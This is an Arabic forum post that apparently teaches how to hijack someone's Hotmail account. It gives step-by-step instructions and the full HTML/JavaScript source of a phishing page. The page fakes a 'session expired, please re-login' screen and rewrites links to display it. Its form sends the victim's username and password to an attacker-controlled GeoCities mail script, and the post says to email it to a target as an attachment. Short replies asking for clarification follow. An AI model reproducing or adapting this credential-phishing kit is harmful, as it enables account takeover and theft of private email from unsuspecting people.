شرح أختراق أي إيميل عن طريق كود جافاسكربت

السلام عليكم و رحمة الله و بركاته

اسأل الله ان تكونوا بخير !

معي شرح قاتل لسرقة البريد الإلكتروني المستهدف عن طريق JAVA SCRIPT

تتحدث هذي القطعه عن كيفيه اختراق الهوت ميل و سرقه الباسورد و اليوسرنيم للضحيه وبذلك يكون لك الحق في التحكم في الاميل تحكم كامل
ويتم هذا عن طريق الjava script
اي انك تقوم بارفاق ملف الجافا مع الاميل و ذلك سيدفع المستخدم الي اعاده النسجيل و هكذا تحصل علي البيانات الخاصه به
طريقه استخدام هذي الثغره:
بسم الله:
- قم بتسجيل و عمل ايميل لك في الهوتميل ولا داعي لكتابه البيانات صحيخه
2-اذهب الي geocities و قم ياختيار username وليكونybwc ثم قم بالتسجيل من اجل صفحه لك و ادخل بيانات خاطئه فيما عدا الاميل (اي ادخل فقط الاميل الذي فرغت من تسجيله في الهوتميل) و نتيجه هذي الخطوه ستحصل علي اميل جديد و سيكون بعنوان ybwc@geocitis.com
3-افتح النوتباد و اكتب هذا الكود:

##################################
<html><head></head><body>
<p>"Go where you want today" - Blue Adept</p>
****************************************
function getmess(){
return "<table border=0 cellpadding=5 cellspacing=5 width=508 height=90%>" +
"<tr valign=middle>" +
"<th colspan=2>" +
"<font face=\"Arial, Helvetica\" size=\"5\">" +
"We're Sorry, We Cannot<br>Process Your Request" +
"</font></th></tr>" +
"<tr valign=middle><td align=center>" +
"<font face=\"Arial, Helvetica\" size=\"3\">Reason: </font>" +
"<font face=\"Arial, Helvetica\" size=\"3\" color=\"#ff0000\"><b>Time expired. Please re-login.</b></font><br>" +
"<font face=\"Arial, Helvetica\" size=\"2\"><a href=\"http://www.hotmail.com/errormsg.html\">(Get more info regarding error messages here)</a></font>" +
"</td></tr>" +
"<tr valign=\"middle\"><td align=\"center\">" +
"<FORM METHOD=POST ACTION=\"http://www.geocities.com/cgi-bin/homestead/mail.pl?ybwc\" target=\"_top\">" +
"<INPUT TYPE=\"hidden\" NAME=\"next-url\" VALUE=\"http://www.hotmail.com\">" +
"<INPUT TYPE=\"hidden\" NAME=\"subject\" VALUE=\"Hotmail Password\">" +
"<table cellpadding=\"0\" cellspacing=\"5\" border=\"0\">" +
"<tr><td><font face=\"Arial, Helvetica\" size=\"2\">Login Name:</font><br><input type=\"text\" name=\"login\" size=\"16\" maxlength=\"16\"></td><td><font face=\"Arial, Helvetica\" size=\"2\">Password:</font><br><input type=\"password\" name=\"passwd\" size=\"16\" maxlength=\"16\"> <input type=\"submit\" value=\"Enter\"></td><tr>" +
"</table></form></td></tr>" +
"<tr valign=middle><th colspan=2 align=center>" +
"<font face=\"Arial, Helvetica\" size=\"3\">" +
"Return to <a href=\"http://welcome.to/www.hotmail.com\" target=\"_parent\">Hotmail's Homepage</a>." +
"</font></th></tr></table>" +
"<p><img src=\"http://209.1.112.251/c9698.gif\" width=189 height=16 border=0 alt=\"Copyright 1996-1997\">";
}

nomenulinks=top.submenu.document.links.length;
for(i=0;i<nomenulinks-1;i++){
top.submenu.document.links[i].target="work";
top.submenu.document.links[i].href="java script:getmess()";
}

noworklinks=top.work.document.links.length;
for(i=0;i<noworklinks-1;i++){
top.work.document.links[i].target="work";
top.work.document.links[i].href="java script:getmess()";
}

</script>
</body>
</html>
###################################
لمن يريد تحميل الكود :

http://adf.ly/Apno6


ثم قم بحفظ الملف بامتداد html و ليكون message.html و ضع في الاعتبار ان اسم المستخدم و هو ybwc l,موجود في السطر رقم 17 اي انك تستطيع التغيير الي اسم مستخدم خاص بك!
4-اكتب رساله و ارفق بداخلها السكربت او ملف الرساله المحفوظه باسم message.html و ارسلها الي ايميل الضحيه

5-انتظر حتي يفتح الضحيه الاميل الخاص به ثم اذهب الي اميلك في الgeocities
و ستجد رساله بداخلها الاي بي و اسم المستخدم و كلمه المرور

وشكرآ

الحقوق محفوظه لدى منتدى خربشات وهستره...

www.travianwar.arabepro.com

ما فهمت ممكن توضح اكثر ؟

آن شآء الله رآح آسسويي شرحح بالصصورر.. !!

steamcommunity.com